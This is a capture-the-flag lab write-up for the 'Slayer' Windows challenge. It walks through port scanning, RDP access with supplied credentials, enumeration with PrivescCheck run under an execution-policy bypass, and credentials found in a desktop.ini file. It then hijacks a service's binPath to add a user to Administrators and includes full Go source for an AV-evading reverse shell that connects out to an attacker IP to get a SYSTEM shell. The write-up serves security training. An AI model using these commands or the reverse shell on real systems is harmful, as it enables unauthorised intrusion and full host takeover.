Slayer
Challenge Lab (Easy) - by Ryan Yager
The following post by 0xb0b is licensed under CC BY 4.0
Scenario
Objective and Scope
Following a successful social engineering engagement, you have obtained user-level credentials for a corporate workstation. Your objective is to leverage this initial access to perform deep reconnaissance on the internal Windows host. The final goal is to escalate privileges and capture the root flag from the administrator's directory to demonstrate full system compromise.
Starting Credentials
tyler.ramsey:P@ssw0rd!Summary
Recon
We start with a rustscan followed by services and default script scan, and we find ports 135 RPC, 445 SMB, 3389 RDP, and 49670 RPC to be open.
rustscan -b 500 -a 10.1.236.103 -- -sC -sV -Pn
The host appears to be a Windows machine Windows 10 build 26100 named EC2AMAZ-M1LFCNO.
RDP via tyler.ramsey
We already have credentials available from the scenario and are testing whether we can connect using RDP with these credentials. We are using Netexec for this. We can see that we are able to authenticate.
nxc rdp 10.1.236.103 -u tyler.ramsey -p 'P@ssw0rd!'
So we connect and use xfreerdp for this. Alternatively, we could also use Remmina or other tools.
xfreerdp +clipboard /u:tyler.ramsey /p:'P@ssw0rd!' /v:10.1.236.103 /cert-ignore
RDP via alice.wonderland
As tyler.ramsey, we see that we do not have any special permissions.
In addition to tyler.ramsey, we also find another user account, alice.wonderland.
We use automated tools to enumerate the target. To get this onto the machine, we host an SMB server using Impacket.
smbserver.py -smb2support EXEGOL $(pwd) -username 0xb0b -password 0xb0b
We use PrivescCehck.ps1 for enumeration, which does not get detected by the AV.
We map the \\10.200.14.213\EXEGOL network share to the x: drive on the local system, using the user0xb0b and password 0xb0b that we have chosen.
net use x: \\10.200.14.213\EXEGOL /user:0xb0b 0xb0bNext, we copy the script from the share to the target.
copy x:\PrivescCheck.ps1 PrivescCheck.ps1 We run for extended checks and let the script creat a human-readable report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"
In the summary, we can already see that services are likely to be a potential privilege escalation vector.
We copy the reports to our attacker machine.
copy PrivescCheck_EC2AMAZ-M1LFCNO.html x:\PrivescCheck_EC2AMAZ-M1LFCNO.html
copy PrivescCheck_EC2AMAZ-M1LFCNO.txt x:\PrivescCheck_EC2AMAZ-M1LFCNO.txtWe identify the SysMgmtAgent Service to be a potential candidate for privilege escalation since the Windows service's executable file - the ImagePath - has insecure file system permission. We need to check if we can write to the serices binary and if we are able to stop/start the service.
We query for the Service, but we are not allowed to start the service.
sc.exe query SysMgmtAgentsc.exe start SysMgmtAgent
We will continue manually. Probably we have to escalate to alice.wonderland. In the root folder we find a suspicious Management folder.
This folder contains some Management files but also a desktop.ini file. Fortunately this contains the credentials of alice.wonderland.
Get-ChildItem -Force | Format-Table Mode, LastWriteTime, Length, Name
We test whether we can connect using RDP with these credentials. We are using Netexec for this. We can see that we are able to authenticate.
nxc rdp 10.1.236.103 -u alice.wonderland -p 'REDACTED' 
Next, we are using xfreerdp to connect to the target machine as alice.wonderland.
xfreerdp +clipboard /u:alice.wonderland /p:'REDACTED' /v:10.1.236.103 /cert-ignore
Privilege Escalation
Recalling the SysMgmtAgent, we check if we can start the service, and are successful.
sc.exe query SysMgmtAgentsc.exe start SysMgmtAgent
We stop the service.
sc.exe stop SysMgmtAgentNext, we try to elevate the permissions of alice.wonderland by adding the user to the local Administrators group. We reconfigure the SysMgmtAgent service to run the command that adds the user alice.wonderland to the local Administrators group when the service starts.
sc.exe config SysMgmtAgent binPath= "cmd.exe /c net localgroup Administrators /add alice.wonderland"Now we start the service, and see that the user alice.wonderland is now part of the local Administrators group.
sc.exe start SysMgmtAgent
Next, we run a powershell session as Administrator and are able to retrieve the final flag at C:\Users\Administrator\root.txt.
Shell as NT Authority System
To get a reverse shell as NT Authority System we can craft a simple reverse shell using Go. This should not be easily detected by an AV. However, we have to compile this on a Windows host.
package main
import (
"net"
"os/exec"
)
func main() {
c, _ := net.Dial("tcp", "10.200.14.213:4445")
cmd := exec.Command("powershell")
cmd.Stdin = c
cmd.Stdout = c
cmd.Stderr = c
cmd.Run()
}We build the reverse shell.
go build -o 0xb0b.exe 0xb0b.goAnd prepare a listener using Penelope. Penelope is a reverse shell handler which tries to auto upgrade the catched reverse shell, fixes TTY size and allows us to manage our
penelope -p 4445We transfer the reverse shell to the target system at C:\Management\0xb0b.exe.
copy x:\0xb0b.exe 0xb0b.exeNext, we set the binPath to C:\Management\0xb0b.exe.
sc.exe config SysMgmtAgent binPath= "C:\Management\0xb0b.exe"We start the service...
sc.exe start SysMgmtAgent
... and receive a connection as NT Authority System.
Last updated
Was this helpful?